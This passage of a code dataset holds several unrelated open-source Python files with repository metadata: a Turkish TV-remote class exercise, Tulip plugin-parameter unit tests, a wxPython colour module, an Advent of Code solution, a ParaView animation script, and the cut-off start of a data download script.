print(\"Şuanki kanal:\",self.kanal)\n\n def __len__(self):\n return len(self.kanal_listesi)\n\n def __str__(self):\n return \"Tv Durumu: {}\\nTv Ses: {}\\nKanal Listesi: {}\\nŞuanki Kanal: {}\\n\".format(self.tv_durum, self.tv_ses, self.kanal_listesi, self.kanal)\n\n\nkumanda = Kumanda()\n\nprint(\"\"\"********************\nTelevizyon Uygulaması\n\n1.Tv Aç\n2.Tv Kapat\n3.Ses Ayarları\n4.Kanal Ekle\n5.Kanal Sayısını Öğrenme\n6.Rastgele Kanala Geçme\n7.Televizyon Bilgileri\n\nÇıkmak için 'q' ya basınız.\n********************\"\"\")\n\nwhile True:\n islem = input(\"İşlemi Seçiniz:\")\n\n if(islem == \"q\"):\n print(\"Program Sonlandırılıyor.\")\n break\n elif(islem == \"1\"):\n kumanda.tv_ac()\n elif(islem == \"2\"):\n kumanda.tv_kapat()\n elif(islem == \"3\"):\n kumanda.ses_ayarları()\n elif(islem == \"4\"):\n kanal_isimleri = input(\"Kanal isimlerini ',' ile ayırarak girin:\")\n eklenecek_kanallar = kanal_isimleri.split(\",\")\n for eklenecekler in eklenecek_kanallar:\n kumanda.kanal_ekle(eklenecekler)\n elif(islem == \"5\"):\n print(\"Kanal Sayısı:\", len(kumanda.kanal_listesi))\n elif(islem == \"6\"):\n kumanda.rastgele_kanal()\n elif(islem == \"7\"):\n print(kumanda)\n else:\n print(\"Geçersiz İşlem\")\n\n","repo_name":"sametcelikbicak/Python","sub_path":"KodlamaEgzersizleri/Nesne Tabanlı Programlama/kumanda_sinifi.py","file_name":"kumanda_sinifi.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"tr","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"27379146819","text":"# This file is part of Tulip (http://tulip.labri.fr)\n#\n# Authors: David Auber and the Tulip development Team\n# from LaBRI, University of Bordeaux\n#\n# Tulip is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License\n# as published by the Free Software Foundation, either version 3\n# of the License, or (at your option) any later version.\n#\n# Tulip is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n# See the GNU General Public License for more details.\n\nimport unittest\nimport sys\n\nfrom tulip import tlp\n\nimport tulipplugins\n\nplugin_name = 'Test Algorithm'\nplugin_author = 'author'\nplugin_date = 'date'\nplugin_info = 'info'\nplugin_version = 'version'\nplugin_group = 'group'\n\nboolean_param_name = 'bool'\nboolean_param_default_value = True\nboolean_param_value = False\n\nint_param_name = 'int'\nint_param_default_value = 5\nint_param_value = -10\n\nfloat_param_name = 'float'\nfloat_param_default_value = 53.35\nfloat_param_value = 156.876\n\nstring_param_name = 'string'\nstring_param_default_value = 'foo'\nstring_param_value = 'bar'\n\nboolean_prop_param_name = 'bool_prop'\nboolean_prop_param_default_value = 'viewSelection'\nboolean_prop_param_value = 'prop_bool'\n\ncolor_prop_param_name = 'color_prop'\ncolor_prop_param_default_value = 'viewColor'\ncolor_prop_param_value = 'prop_color'\n\ndouble_prop_param_name = 'double_prop'\ndouble_prop_param_default_value = 'viewMetric'\ndouble_prop_param_value = 'color_prop'\n\nint_prop_param_name = 'int_prop'\nint_prop_param_default_value = 'viewShape'\nint_prop_param_value = 'prop_int'\n\nlayout_prop_param_name = 'layout_prop'\nlayout_prop_param_default_value = 'viewLayout'\nlayout_prop_param_value = 'prop_layout'\n\nsize_prop_param_name = 'size_prop'\nsize_prop_param_default_value = 'viewSize'\nsize_prop_param_value = 
'prop_size'\n\nstring_prop_param_name = 'string_prop'\nstring_prop_param_default_value = 'viewLabel'\nstring_prop_param_value = 'prop_string'\n\nboolean_vec_prop_param_name = 'bool_vec_prop'\nboolean_vec_prop_param_default_value = 'bool_vector'\n\ncolor_vec_prop_param_name = 'color_vec_prop'\ncolor_vec_prop_param_default_value = 'color_vector'\n\ndouble_vec_prop_param_name = 'double_vec_prop'\ndouble_vec_prop_param_default_value = 'double_vector'\n\nint_vec_prop_param_name = 'int_vec_prop'\nint_vec_prop_param_default_value = 'int_vector'\n\ncoord_vec_prop_param_name = 'coord_vec_prop'\ncoord_vec_prop_param_default_value = 'coord_vector'\n\nsize_vec_prop_param_name = 'size_vec_prop'\nsize_vec_prop_param_default_value = 'size_vector'\n\nstring_vec_prop_param_name = 'string_vec_prop'\nstring_vec_prop_param_default_value = 'string_vector'\n\ncolor_param_name = 'color'\ncolor_param_default_value = '(128,128,128,128)'\ncolor_param_value = tlp.Color.Blue\ncolor_param_tuple_value = (0, 0, 255)\n\ncolor_scale_param_name = 'color_scale'\ncolor_scale_param_default_value = '((255,0,0,255),(0,255,0,255),(0,0,255,255))'\ncolor_scale_default_value_dict = {0.0: (255, 0, 0, 255),\n 0.5: (0, 255, 0, 255),\n 1.0: (0, 0, 255, 255)}\ncolor_scale_param_value_dict = {0.0: (255, 0, 255, 255),\n 0.5: (128, 255, 0, 255),\n 1.0: (128, 0, 255, 255)}\ncolor_scale_param_value_list = [(255, 0, 255, 255), (128, 255, 0, 255),\n (128, 0, 255, 255)]\ncolor_scale_param_value = tlp.ColorScale(color_scale_param_value_dict)\n\ndir_param_name = 'dir'\ndir_param_default_value = '/tmp'\ndir_param_value = '/home/toto'\n\nfile_param_name = 'file'\nfile_param_default_value = '/tmp/foo.csv'\nfile_param_value = '/home/toto/bar.csv'\n\nstring_collection_param_name = 'string collection'\nstring_collection_param_default_value = 'foo;bar'\nstring_collection_param_value = 'bar'\n\nout_boolean_param_name = 'bool_out'\nout_boolean_param_value = True\nout_int_param_name = 'int_out'\nout_int_param_value = 2\nout_float_param_name = 'float_out'\nout_float_param_value = 0.5\nout_string_param_name = 'string_out'\nout_string_param_value = 'toto'\n\nparameters_value = {}\n\n\nclass TestAlgorithm(tlp.Algorithm):\n\n def __init__(self, context):\n tlp.Algorithm.__init__(self, context)\n\n self.addBooleanParameter(\n boolean_param_name,\n defaultValue=str(boolean_param_default_value))\n\n self.addColorParameter(\n color_param_name,\n defaultValue=color_param_default_value)\n\n self.addColorScaleParameter(\n color_scale_param_name,\n defaultValue=color_scale_param_default_value)\n\n self.addIntegerParameter(\n int_param_name,\n defaultValue=str(int_param_default_value))\n\n self.addFloatParameter(\n float_param_name,\n defaultValue=str(float_param_default_value))\n\n self.addStringParameter(\n string_param_name,\n defaultValue=str(string_param_default_value))\n\n self.addDirectoryParameter(\n dir_param_name,\n defaultValue=dir_param_default_value)\n\n self.addFileParameter(\n file_param_name,\n defaultValue=file_param_default_value)\n\n self.addStringCollectionParameter(\n string_collection_param_name,\n defaultValue=string_collection_param_default_value)\n\n self.addBooleanPropertyParameter(\n boolean_prop_param_name,\n defaultValue=boolean_prop_param_default_value)\n\n self.addColorPropertyParameter(\n color_prop_param_name,\n defaultValue=color_prop_param_default_value)\n\n self.addDoublePropertyParameter(\n double_prop_param_name,\n defaultValue=double_prop_param_default_value)\n\n self.addIntegerPropertyParameter(\n int_prop_param_name,\n 
defaultValue=int_prop_param_default_value)\n\n self.addLayoutPropertyParameter(\n layout_prop_param_name,\n defaultValue=layout_prop_param_default_value)\n\n self.addSizePropertyParameter(\n size_prop_param_name,\n defaultValue=size_prop_param_default_value)\n\n self.addStringPropertyParameter(\n string_prop_param_name,\n defaultValue=string_prop_param_default_value)\n\n self.addBooleanVectorPropertyParameter(\n boolean_vec_prop_param_name,\n defaultValue=boolean_vec_prop_param_default_value)\n\n self.addColorVectorPropertyParameter(\n color_vec_prop_param_name,\n defaultValue=color_vec_prop_param_default_value)\n\n self.addDoubleVectorPropertyParameter(\n double_vec_prop_param_name,\n defaultValue=double_vec_prop_param_default_value)\n\n self.addIntegerVectorPropertyParameter(\n int_vec_prop_param_name,\n defaultValue=int_vec_prop_param_default_value)\n\n self.addCoordVectorPropertyParameter(\n coord_vec_prop_param_name,\n defaultValue=coord_vec_prop_param_default_value)\n\n self.addSizeVectorPropertyParameter(\n size_vec_prop_param_name,\n defaultValue=size_vec_prop_param_default_value)\n\n self.addStringVectorPropertyParameter(\n string_vec_prop_param_name,\n defaultValue=string_vec_prop_param_default_value)\n\n self.addBooleanParameter(out_boolean_param_name, outParam=True)\n self.addIntegerParameter(out_int_param_name, outParam=True)\n self.addFloatParameter(out_float_param_name, outParam=True)\n self.addStringParameter(out_string_param_name, outParam=True)\n\n def check(self):\n return (True, 'Ok')\n\n def run(self):\n p = parameters_value\n d = self.dataSet\n p[boolean_param_name] = d[boolean_param_name]\n p[int_param_name] = d[int_param_name]\n p[float_param_name] = d[float_param_name]\n p[string_param_name] = d[string_param_name]\n p[string_collection_param_name] = d[string_collection_param_name]\n\n p[color_param_name] = tlp.Color(d[color_param_name])\n p[color_scale_param_name] = tlp.ColorScale(d[color_scale_param_name])\n\n p[boolean_prop_param_name] = d[boolean_prop_param_name]\n p[color_prop_param_name] = d[color_prop_param_name]\n p[double_prop_param_name] = d[double_prop_param_name]\n p[int_prop_param_name] = d[int_prop_param_name]\n p[layout_prop_param_name] = d[layout_prop_param_name]\n p[size_prop_param_name] = d[size_prop_param_name]\n p[string_prop_param_name] = d[string_prop_param_name]\n p[boolean_vec_prop_param_name] = d[boolean_vec_prop_param_name]\n p[color_vec_prop_param_name] = d[color_vec_prop_param_name]\n p[double_vec_prop_param_name] = d[double_vec_prop_param_name]\n p[int_vec_prop_param_name] = d[int_vec_prop_param_name]\n p[coord_vec_prop_param_name] = d[coord_vec_prop_param_name]\n p[size_vec_prop_param_name] = d[size_vec_prop_param_name]\n p[string_vec_prop_param_name] = d[string_vec_prop_param_name]\n\n d[out_boolean_param_name] = out_boolean_param_value\n d[out_int_param_name] = out_int_param_value\n d[out_float_param_name] = out_float_param_value\n d[out_string_param_name] = out_string_param_value\n\n return True\n\n\ntulipplugins.registerPluginOfGroup(\n 'TestAlgorithm', plugin_name, plugin_author,\n plugin_date, plugin_info, plugin_version, plugin_group)\n\n\nclass TestPluginParameters(unittest.TestCase):\n\n def setUp(self):\n self.graph = tlp.newGraph()\n\n self.boolean_prop = self.graph.getBooleanProperty(\n boolean_prop_param_value)\n\n self.color_prop = self.graph.getColorProperty(\n color_prop_param_value)\n\n self.double_prop = self.graph.getDoubleProperty(\n double_prop_param_value)\n\n self.int_prop = self.graph.getIntegerProperty(\n 
int_prop_param_value)\n\n self.layout_prop = self.graph.getLayoutProperty(\n layout_prop_param_value)\n\n self.size_prop = self.graph.getSizeProperty(size_prop_param_value)\n\n self.string_prop = self.graph.getStringProperty(\n string_prop_param_value)\n\n self.boolean_vec_prop = self.graph.getBooleanVectorProperty(\n boolean_vec_prop_param_default_value)\n\n self.color_vec_prop = self.graph.getColorVectorProperty(\n color_vec_prop_param_default_value)\n\n self.double_vec_prop = self.graph.getDoubleVectorProperty(\n double_vec_prop_param_default_value)\n\n self.int_vec_prop = self.graph.getIntegerVectorProperty(\n int_vec_prop_param_default_value)\n\n self.coord_vec_prop = self.graph.getCoordVectorProperty(\n coord_vec_prop_param_default_value)\n\n self.size_vec_prop = self.graph.getSizeVectorProperty(\n size_vec_prop_param_default_value)\n\n self.string_vec_prop = self.graph.getStringVectorProperty(\n string_vec_prop_param_default_value)\n\n def tearDown(self):\n self.graph = None\n\n def test_plugin_is_registered(self):\n self.assertIn(plugin_name, tlp.getAlgorithmPluginsList())\n plugin = tlp.PluginLister.pluginInformation(plugin_name)\n self.assertEqual(plugin.category(), 'Algorithm')\n self.assertEqual(plugin.name(), plugin_name)\n self.assertEqual(plugin.author(), plugin_author)\n self.assertEqual(plugin.date(), plugin_date)\n self.assertEqual(plugin.info(), plugin_info)\n self.assertEqual(plugin.release(), plugin_version)\n self.assertEqual(plugin.group(), plugin_group)\n self.assertEqual(plugin.programmingLanguage(), 'Python')\n\n def test_plugin_default_parameters(self):\n plugin_default_params = tlp.getDefaultPluginParameters(plugin_name,\n self.graph)\n\n self.assertIn(boolean_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[boolean_param_name]), bool)\n self.assertEqual(plugin_default_params[boolean_param_name],\n boolean_param_default_value)\n\n self.assertIn(color_param_name, plugin_default_params)\n\n self.assertTrue(isinstance(plugin_default_params[color_param_name],\n tlp.Color))\n\n self.assertEqual(repr(plugin_default_params[color_param_name]),\n color_param_default_value)\n\n self.assertIn(color_scale_param_name,\n plugin_default_params)\n\n self.assertTrue(\n isinstance(plugin_default_params[color_scale_param_name],\n tlp.ColorScale))\n\n self.assertEqual(plugin_default_params[color_scale_param_name],\n tlp.ColorScale(color_scale_default_value_dict))\n\n self.assertIn(int_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[int_param_name]), int)\n self.assertEqual(plugin_default_params[int_param_name],\n int_param_default_value)\n\n self.assertIn(float_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[float_param_name]), float)\n self.assertEqual(plugin_default_params[float_param_name],\n float_param_default_value)\n\n self.assertIn(string_param_name, plugin_default_params)\n self.assertEqual(type(plugin_default_params[string_param_name]), str)\n self.assertEqual(plugin_default_params[string_param_name],\n string_param_default_value)\n\n self.assertIn(string_collection_param_name, plugin_default_params)\n self.assertEqual(\n type(plugin_default_params[string_collection_param_name]), str)\n self.assertEqual(plugin_default_params[string_collection_param_name],\n string_collection_param_default_value.split(';')[0])\n\n self.assertIn(boolean_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[boolean_prop_param_name],\n 
tlp.BooleanProperty))\n self.assertEqual(\n plugin_default_params[boolean_prop_param_name].getName(),\n boolean_prop_param_default_value)\n\n self.assertIn(color_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[color_prop_param_name],\n tlp.ColorProperty))\n self.assertEqual(\n plugin_default_params[color_prop_param_name].getName(),\n color_prop_param_default_value)\n\n self.assertIn(double_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[double_prop_param_name],\n tlp.DoubleProperty))\n self.assertEqual(\n plugin_default_params[double_prop_param_name].getName(),\n double_prop_param_default_value)\n\n self.assertIn(int_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[int_prop_param_name],\n tlp.IntegerProperty))\n self.assertEqual(\n plugin_default_params[int_prop_param_name].getName(),\n int_prop_param_default_value)\n\n self.assertIn(layout_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[layout_prop_param_name],\n tlp.LayoutProperty))\n self.assertEqual(\n plugin_default_params[layout_prop_param_name].getName(),\n layout_prop_param_default_value)\n\n self.assertIn(size_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[size_prop_param_name],\n tlp.SizeProperty))\n self.assertEqual(\n plugin_default_params[size_prop_param_name].getName(),\n size_prop_param_default_value)\n\n self.assertIn(string_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[string_prop_param_name],\n tlp.StringProperty))\n self.assertEqual(\n plugin_default_params[string_prop_param_name].getName(),\n string_prop_param_default_value)\n\n self.assertIn(boolean_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[boolean_vec_prop_param_name],\n tlp.BooleanVectorProperty))\n self.assertEqual(\n plugin_default_params[boolean_vec_prop_param_name].getName(),\n boolean_vec_prop_param_default_value)\n\n self.assertIn(color_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[color_vec_prop_param_name],\n tlp.ColorVectorProperty))\n self.assertEqual(\n plugin_default_params[color_vec_prop_param_name].getName(),\n color_vec_prop_param_default_value)\n\n self.assertIn(double_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[double_vec_prop_param_name],\n tlp.DoubleVectorProperty))\n self.assertEqual(\n plugin_default_params[double_vec_prop_param_name].getName(),\n double_vec_prop_param_default_value)\n\n self.assertIn(int_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[int_vec_prop_param_name],\n tlp.IntegerVectorProperty))\n self.assertEqual(\n plugin_default_params[int_vec_prop_param_name].getName(),\n int_vec_prop_param_default_value)\n\n self.assertIn(coord_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[coord_vec_prop_param_name],\n tlp.CoordVectorProperty))\n self.assertEqual(\n plugin_default_params[coord_vec_prop_param_name].getName(),\n coord_vec_prop_param_default_value)\n\n self.assertIn(size_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[size_vec_prop_param_name],\n tlp.SizeVectorProperty))\n self.assertEqual(\n plugin_default_params[size_vec_prop_param_name].getName(),\n 
size_vec_prop_param_default_value)\n\n self.assertIn(string_vec_prop_param_name, plugin_default_params)\n self.assertTrue(\n isinstance(plugin_default_params[string_vec_prop_param_name],\n tlp.StringVectorProperty))\n self.assertEqual(\n plugin_default_params[string_vec_prop_param_name].getName(),\n string_vec_prop_param_default_value)\n\n def test_plugin_in_parameters(self):\n plugin_params = tlp.getDefaultPluginParameters(plugin_name, self.graph)\n\n plugin_params[boolean_param_name] = boolean_param_value\n plugin_params[int_param_name] = int_param_value\n plugin_params[float_param_name] = float_param_value\n plugin_params[string_param_name] = string_param_value\n plugin_params[\n string_collection_param_name] = string_collection_param_value\n plugin_params[color_scale_param_name] = color_scale_param_value\n plugin_params[color_param_name] = color_param_value\n\n plugin_params[boolean_prop_param_name] = self.boolean_prop\n plugin_params[color_prop_param_name] = self.color_prop\n plugin_params[double_prop_param_name] = self.double_prop\n plugin_params[int_prop_param_name] = self.int_prop\n plugin_params[layout_prop_param_name] = self.layout_prop\n plugin_params[size_prop_param_name] = self.size_prop\n plugin_params[string_prop_param_name] = self.string_prop\n plugin_params[boolean_vec_prop_param_name] = self.boolean_vec_prop\n plugin_params[color_vec_prop_param_name] = self.color_vec_prop\n plugin_params[double_vec_prop_param_name] = self.double_vec_prop\n plugin_params[int_vec_prop_param_name] = self.int_vec_prop\n plugin_params[coord_vec_prop_param_name] = self.coord_vec_prop\n plugin_params[size_vec_prop_param_name] = self.size_vec_prop\n plugin_params[string_vec_prop_param_name] = self.string_vec_prop\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertEqual(parameters_value[boolean_param_name],\n boolean_param_value)\n self.assertEqual(parameters_value[int_param_name], int_param_value)\n self.assertEqual(parameters_value[float_param_name], float_param_value)\n self.assertEqual(parameters_value[string_param_name],\n string_param_value)\n self.assertEqual(parameters_value[string_param_name],\n string_param_value)\n self.assertEqual(parameters_value[string_collection_param_name],\n string_collection_param_value)\n self.assertEqual(parameters_value[color_param_name], color_param_value)\n self.assertEqual(parameters_value[color_scale_param_name],\n color_scale_param_value)\n\n self.assertEqual(parameters_value[boolean_prop_param_name],\n self.boolean_prop)\n self.assertEqual(parameters_value[color_prop_param_name],\n self.color_prop)\n self.assertEqual(parameters_value[double_prop_param_name],\n self.double_prop)\n self.assertEqual(parameters_value[int_prop_param_name], self.int_prop)\n self.assertEqual(parameters_value[layout_prop_param_name],\n self.layout_prop)\n self.assertEqual(parameters_value[size_prop_param_name],\n self.size_prop)\n self.assertEqual(parameters_value[string_prop_param_name],\n self.string_prop)\n self.assertEqual(parameters_value[boolean_vec_prop_param_name],\n self.boolean_vec_prop)\n self.assertEqual(parameters_value[color_vec_prop_param_name],\n self.color_vec_prop)\n self.assertEqual(parameters_value[double_vec_prop_param_name],\n self.double_vec_prop)\n self.assertEqual(parameters_value[int_vec_prop_param_name],\n self.int_vec_prop)\n self.assertEqual(parameters_value[coord_vec_prop_param_name],\n self.coord_vec_prop)\n self.assertEqual(parameters_value[size_vec_prop_param_name],\n 
self.size_vec_prop)\n self.assertEqual(parameters_value[string_vec_prop_param_name],\n self.string_vec_prop)\n\n plugin_params[color_param_name] = color_param_tuple_value\n del parameters_value[color_param_name]\n\n plugin_params[color_scale_param_name] = color_scale_param_value_dict\n del parameters_value[color_scale_param_name]\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertEqual(parameters_value[color_param_name], color_param_value)\n self.assertEqual(parameters_value[color_scale_param_name],\n color_scale_param_value)\n\n plugin_params[color_scale_param_name] = color_scale_param_value_list\n del parameters_value[color_scale_param_name]\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertEqual(parameters_value[color_scale_param_name],\n color_scale_param_value)\n\n plugin_params[string_collection_param_name] = 'toto'\n\n with self.assertRaises(Exception) as cm:\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertContains(\n cm.exception.args[0], 'Possible values are : foo, bar')\n\n def test_plugin_out_parameters(self):\n plugin_params = tlp.getDefaultPluginParameters(plugin_name, self.graph)\n\n plugin_ret = self.graph.applyAlgorithm(plugin_name, plugin_params)\n self.assertTrue(plugin_ret[0])\n\n self.assertIn(out_boolean_param_name, plugin_params)\n self.assertEqual(plugin_params[out_boolean_param_name],\n out_boolean_param_value)\n\n self.assertIn(out_int_param_name, plugin_params)\n self.assertEqual(plugin_params[out_int_param_name],\n out_int_param_value)\n\n self.assertIn(out_float_param_name, plugin_params)\n self.assertEqual(plugin_params[out_float_param_name],\n out_float_param_value)\n\n self.assertIn(out_string_param_name, plugin_params)\n self.assertEqual(plugin_params[out_string_param_name],\n out_string_param_value)\n","repo_name":"Tulip-Dev/tulip","sub_path":"tests/python/test_plugin_registration_and_parameters.py","file_name":"test_plugin_registration_and_parameters.py","file_ext":"py","file_size_in_byte":25105,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"54"} +{"seq_id":"32616966998","text":"import wx\n\nCOLORS = {'text': wx.Colour(0, 0, 0),\n 'bg': wx.Colour(240,240,230),\n 'nb_active': wx.Colour(254,254,195),\n 'nb_area': wx.Colour(250,250,245),\n 'nb_text': wx.Colour(10,10,180),\n 'nb_activetext': wx.Colour(80,10,10),\n 'title': wx.Colour(80,10,10),\n 'pvname': wx.Colour(10,10,80),\n 'list_bg': wx.Colour(255, 255, 250),\n 'list_fg': wx.Colour(5, 5, 25)}\n\nclass GUIColors(object):\n def __init__(self):\n for key, rgb in COLORS.items():\n setattr(self, key,rgb)\n\ndef set_color(widget, color, bg=None):\n if color not in COLORS:\n color = 'text'\n widget.SetForegroundColour(COLORS[color])\n if bg is not None:\n if bg not in COLORS:\n color = 'bg'\n method = widget.SetBackgroundColour(COLORS[bg])\n","repo_name":"newville/wxutils","sub_path":"wxutils/colors.py","file_name":"colors.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36458362186","text":"\n\nimport numpy as np\nfrom numpy.core.numeric import count_nonzero\n\nwith open(\"input.txt\") as f:\n text = f.read()\n\nnums = [list(map(int, list(a))) for a in text.splitlines()]\n\ndef calc_most_common_digit(array, num_entries):\n return '1' if count_nonzero(array) >= num_entries / 2 else '0'\n\ndef 
calc_least_common_digit(array, num_entries):\n return '0' if count_nonzero(array) >= num_entries / 2 else '1'\n\nnum_rows = len(nums[0])\n\ndigits = []\n\nfor i in range(num_rows):\n if len(nums) > 1:\n matrix = np.transpose(np.asarray(nums))\n value = calc_most_common_digit(matrix[i], len(nums))\n nums = [entry for entry in nums if entry[i] == int(value)]\n\n# reset nums\nnums2 = [list(map(int, list(a))) for a in text.splitlines()]\ndigits = []\n\n# calculate CO2 scrubber rating\nfor i in range(num_rows):\n if len(nums2) > 1:\n matrix = np.transpose(np.asarray(nums2))\n value = calc_least_common_digit(matrix[i], len(nums2))\n nums2 = [entry for entry in nums2 if entry[i] == int(value)]\n\nrating1 = \"\".join([str(i) for i in nums[0]])\nrating2 = \"\".join([str(i) for i in nums2[0]])\n\nnum1 = int(rating1, 2)\nnum2 = int(rating2, 2)\n\nprint(num1 * num2)\n\n\n","repo_name":"s-cooper18/advent-of-code-2021","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40181591255","text":"from paraview.simple import *\nfrom paravision import ConfigHandler\nimport argparse\nfrom addict import Dict\nfrom paravision.utils import find_preset\n\nfrom rich import print, print_json\n\nfrom paravision.utils import parse_cmdline_args, read_files, view_handler\nfrom paravision.project import projector\n\nfrom paravision.defaults import DEFAULT_CONFIG\n\ndef animate(reader, **kwargs):\n\n config = DEFAULT_CONFIG\n config.update(kwargs)\n\n scalars = config.get('scalars') or reader.PointArrayStatus\n scalarBarVisible = config.get('show_scalar_bar', False)\n geometry = config.get('geometry', [2560, 1440])\n axisVisible = config.get('show_axis', False)\n zoom = config.get('zoom', 1)\n\n animationScene = GetAnimationScene()\n timekeeper = GetTimeKeeper()\n animationScene.UpdateAnimationUsingDataTimeSteps()\n timeArray = reader.TimestepValues\n nts = len(timeArray) or 1\n\n ## TODO: Animate using constant scalarbar range\n ## TODO: Fix animation for one timestep\n\n # try:\n # ## Use last timestep as reference for creating color map\n # animationScene.AnimationTime = reader.TimestepValues[-1]\n # timekeeper.Time = reader.TimestepValues[-1]\n # except:\n # ## for files without time data\n # animationScene.AnimationTime = 0\n # animationScene.StartTime = 0\n # animationScene.EndTime = 0\n # timekeeper.Time = 0\n\n # projection = Projection(reader, projectionType)\n projection = projector(reader, *config.get('project', [None, None, None, None]))\n\n view = GetActiveViewOrCreate('RenderView')\n projectionDisplay = Show(projection, view)\n projectionDisplay.Representation = config.get( 'display_representation' )\n view.OrientationAxesVisibility = int(axisVisible)\n projectionDisplay.RescaleTransferFunctionToDataRange()\n view.ViewSize = geometry\n view.Update()\n\n # setCameraOrientation(zoom)\n view_handler(config['view'], config['zoom'])\n\n for scalar in scalars:\n print(\"Animating\", scalar )\n\n if scalar == 'None':\n ColorBy(projectionDisplay, None)\n else:\n ColorBy(projectionDisplay, ('POINTS', scalar))\n\n # ## NOTE: Removing this should HELP fix the varying scalar bar range for every frame\n # projectionDisplay.RescaleTransferFunctionToDataRange()\n\n ## Find the min/max range of data over all timesteps\n pd_ranges_t = []\n for timestep in range(nts):\n projection.UpdatePipeline(timeArray[timestep])\n pd = projection.PointData\n 
pd_ranges_t.append(pd.GetArray(scalar).GetRange())\n\n pd_range_min = min(pd_ranges_t)[0]\n pd_range_max = max(pd_ranges_t)[1]\n\n print(f\"Setting color bar range to min/max over all timesteps: {(pd_range_min, pd_range_max)}\")\n\n wLUT = GetColorTransferFunction(scalar)\n wPWF = GetOpacityTransferFunction(scalar)\n HideScalarBarIfNotNeeded(wLUT, view)\n\n wLUT.ApplyPreset(find_preset( config['colormap'] , config['colormap_fuzzy_cutoff']), True)\n\n wLUT.RescaleTransferFunction(pd_range_min, pd_range_max)\n\n view.Update()\n UpdateScalarBars()\n projectionDisplay.SetScalarBarVisibility(view, scalarBarVisible)\n\n SaveAnimation(scalar + '.png', view, ImageResolution=geometry, TransparentBackground=1, SuffixFormat='.%04d')\n\ndef animate_parser(args, local_args_list): \n\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"FILES\", nargs='*', help=\"files..\")\n\n print(local_args_list)\n\n local_args = ap.parse_args(local_args_list)\n local_args = Dict(vars(local_args))\n\n print_json(data=local_args)\n\n args.update([ (k,v) for k,v in local_args.items() if v is not None])\n\n return args\n\nif __name__==\"__main__\":\n config = ConfigHandler()\n args, local_args_list = config.parse_config_and_cmdline_args()\n args = animate_parser(args, local_args_list)\n reader = read_files(args['FILES'], filetype=args['filetype'])\n\n animate(reader, **args)\n","repo_name":"modsim/ChromaHD-paravision","sub_path":"paravision/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38103127849","text":"\"\"\"Download files.\n\nWe use Pooch, a Python library dedicated to fetch data files\nhttps://www.fatiando.org/pooch/latest/index.html\n\nPooch can download a file and verify its integrity with a given hash.\nIt also uses a local cache and downloads data once.\n\"\"\"\n\nimport argparse\nimport pathlib\n\nimport pandas as pd\nimport pooch\n\n\ndef get_cli_arguments():\n \"\"\"Argument parser.\n\n This function parses the name of input files.\n\n Returns\n -------\n argparse.Namespace\n Object containing arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-i\",\n \"--input\",\n action=\"store\",\n type=str,\n help=\"Input file with file list.\",\n required=True,\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n action=\"store\",\n type=str,\n help=\"Output directory to download files.\",\n required=True,\n )\n parser.add_argument(\n \"-t\",\n \"--type\",\n action=\"append\",\n type=str,\n help=\"File extensions to to download.\",\n required=True,\n )\n return parser.parse_args()\n\n\ndef verify_file_exists(filename):\n \"\"\"Verify file exists.\n\n Parameters\n ----------\n filename : str\n Name of file to verify existence\n \"\"\"\n file_in = pathlib.Path(filename)\n if not file_in.exists():\n raise FileNotFoundError(f\"File {filename} not found\")\n if not file_in.is_file():\n raise FileNotFoundError(f\"File {filename} is not a file\")\n\n\ndef select_files_to_download(filename, file_types):\n \"\"\"Load and merge datasets and files.\n\n Parameters\n ----------\n filename : str\n Name of file that contains file list\n file_types : list\n File extensions to download\n\n Returns\n -------\n str\n Data repository name\n Pandas dataframe\n Select files dataframe\n \"\"\"\n files = pd.read_csv(filename, sep=\"\\t\")\n print(f\"Found {files.shape[0]} files in {filename}\")\n repository_name = files.iloc[0][\"origin\"]\n print(f\"Data 
